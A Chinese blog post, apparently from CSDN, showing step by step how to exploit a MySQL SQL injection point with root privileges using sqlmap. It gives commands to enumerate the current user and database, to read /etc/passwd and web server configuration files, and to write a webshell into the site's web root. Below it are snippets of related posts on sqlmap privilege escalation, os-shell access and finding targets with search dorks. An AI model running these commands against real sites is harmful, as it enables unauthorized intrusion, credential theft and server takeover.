sqlmap注入mysql_sqlmap之mysql root权限注入点

最新推荐文章于 2023-06-20 08:07:55 发布
最新推荐文章于 2023-06-20 08:07:55 发布
阅读量514 收藏
点赞数
文章标签: sqlmap注入mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31282885/article/details/113191173
版权

遇到一mysql root权限注入点,尝试用sqlmap进一步渗透获取更高权限,具体如下:

判断注入点的当前用户和当前数据库

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-db

root权限注入点可以尝试读取系统文件,比如/etc/passwd,以及apache,nginx的配置文件等,相关配置文件路径如下:

nginx: usr/local/nginx/conf/nginx.conf

常用的apache配置文件路径有:

/etc/httpd/conf/httpd.conf

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

sqlmap读取文件语法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-read "/etc/passwd"

如果magic_quotes_gpc=off就可以尝试进行写入Webshell,sqlmap写入文件语法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" –file-write /test/test.txt –file-dest /var/www/html/1.txt

将本地的test.txt写入到站点服务器的html目录下。

穿时念
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
SQLmap注入获取Webshell及系统权限研究
sqlmap提权
m0_51822230的博客
05-17 4300
mysql提权 一.os-shell提权 建立os-shell前提条件: ①必须要有dba权限 ②secure_file_priv必须为空,不然无法写入文件 这是secure_file_priv为null的情况下 这是secure_file_priv为空的情况下 ③知道网站的绝对路径 1、首先查看当前用户权限,是dba后进行os-shell建立 2、sqlmap -u “http://192.168.43.194/sqli/Less-1/?id=1” --os-shell 在这里选择网页语言,根据网页
sqlmap mysql root_实例sqlmap进行mysql注入root权限读写文件
weixin_29058331的博客
01-19 319
实例sqlmap进行mysql注入root权限读写文件(2012-08-02 16:01:33)注解: 1.在BT5 R2下 sqlmap安装路径为root@bt:/pentest/database/sqlmap# 也可以通过启动快捷方式启动sqlmap root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://www.wepost....
sqlmap进行mysql注入root权限读写文件
u013473439的专栏
01-14 5853
1.在BT5 R2下root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --current-db -v 1 /*获取当前用户和当前数据库   返回结果 :   [02:42:20] [INFO] fetching current user cu
sqlmap mysql root_sqlmap注入mysql和到root权限后怎么样深入
weixin_33281940的博客
01-19 148
碰着一mysql root权限注入,实验用sqlmap进一步渗透获取更高权限,东亚服务器台湾服务器,详细如下:判定注入的当前用户和当前数据库./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user./sqlmap.py -u "http://www.nxadmin.com/sql-injectio...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
sql注入之数字型注入
08-02
SQL 注入之数字型注入 SQL 注入之数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和...
Linux利用UDF库实现Mysql提权
09-10
8. **权限管理**:在实际操作中,由于MySQL服务器通常以非root权限运行,因此可能需要调整相关目录的权限,以确保MySQL能够访问和写入UDF库文件。 请注意,这种提权方法具有潜在的安全风险,如果被恶意利用,可能...
WriteUp:Kali渗透 - 通过Sqlmap直接获得服务器权限
Zeker62的博客
08-18 997
靶场链接:https://hack.zkaq.cn/battle/target?id=aabe6f2bda75107c 使用sqlmap进行渗透测试 找到可能存在注入的网站,http://59.63.200.79:6453/single.php?id=1放到sqlmap上跑: sqlmap -u "http://59.63.200.79:6453/single.php?id=1" 发现三个SQL漏洞: 爆库:sqlmap -u "http://59.63.200.79:6453/single.
sqlmap使用方法
天上掉馅饼
02-25 1154
sqlmap使用方法
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 3万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
Sqlmap使用及提权
qq_43757105的博客
10-16 9170
目录 一、获取账密 ​二、Sqlmap提权 ​ 一、获取账密 检查注入,发现存在sql注入 --dbs 检查数据库名 --current-user 当前连接数据库的用户名 --current-db 当前连接数据库的名字 -D "数据库名" 指定目标数据库名 --tables 列出数据库中所有的表名 -T "cms_...
sqlmap工具使用
huangyongkang666的博客
03-21 3571
sqlmap工具使用 1.sqlmap介绍 SQLMAP是开源的自动化SQL注入工具,由Python写成,具有如下特: 1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入
sqlmap mysql root权限 执行命令_实例sqlmap进行mysql注入root权限读写文件
weixin_42311115的博客
02-01 805
1.在BT5 R2下root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --current-db -v 1 /*获取当前用户和当前数据库返回结果 :[02:42:20] [INFO] fetching current user current us...
【CTF】sqlmap之POST注入的两种方法(-r 和--data)
HAPPY
07-30 8271
sqlmap进行做post注入测试的时候,发现这么一种情况: 对POST请求,之前一直用 “-r txt文件”的形式,进行注入测试; 发现还有另一种POST,用“-r txt文件”的形式进行却无效,原来可以通过“--data="key=value"”来进行测试注入。   故以上两种情况都是post的,却还是有区别的   故此记录如下: 1:POST注入时,什么时候用“-r txt文...
Sqlmap进阶命令使用
一醉一休的博客
02-27 1988
一.使用条件 想通过SQL注入获取对方服务器权限,需要满足以下条件:  (1)当前SQL注入的用户必须为DBA权限(–is-dba为true)  (2)需要知道网站的绝对路径  (3)GPC为off,php主动转义功能为关闭  (4)my.ini文件中的这项配置secure_file_priv="" 为空 二.文件操作 如何知道绝对路径 1.探针文件,phpinfo文件,在phpinfo文件中搜索DOCUMENT_ROOT 2.报错页面,ThinkPHP,debug=true 报错 , IIS报错 3.
sqlmap+nikto进行渗透测试获取管理员账号密码操作实例
WEL测试
10-18 8893
首先,在百度搜索输入框输入:inurl:asp?id=,在搜索列表中选择连接类似如下的url:http://域名/about.asp?id=325。 其次,打开BT5,打开sqlmap,执行如下格式命令:./sqlmap.py -u "http://域名/about.asp?id=325" --dbs --current-user,执行命令如下截图: 该命令是获取web服务操作系统、w
sqlmap使用 mysql_sqlmap使用教程
weixin_39933713的博客
02-11 456
SQLMAP简介sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。1.支持的数据库:MySQL, Oracle,PostgreSQL, Microsoft SQL Server, M...
sqlmap从txt文件注入
最新发布
07-29
\[1\]在这个过程中,sqlmap会自动检测注入并执行相应的注入操作。如果你想要执行多条语句进行注入,可以使用参数-m,例如sqlmap -m /usr/b.txt。\[1\]这样可以针对多条语句进行注入操作。另外,如果你想要将注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值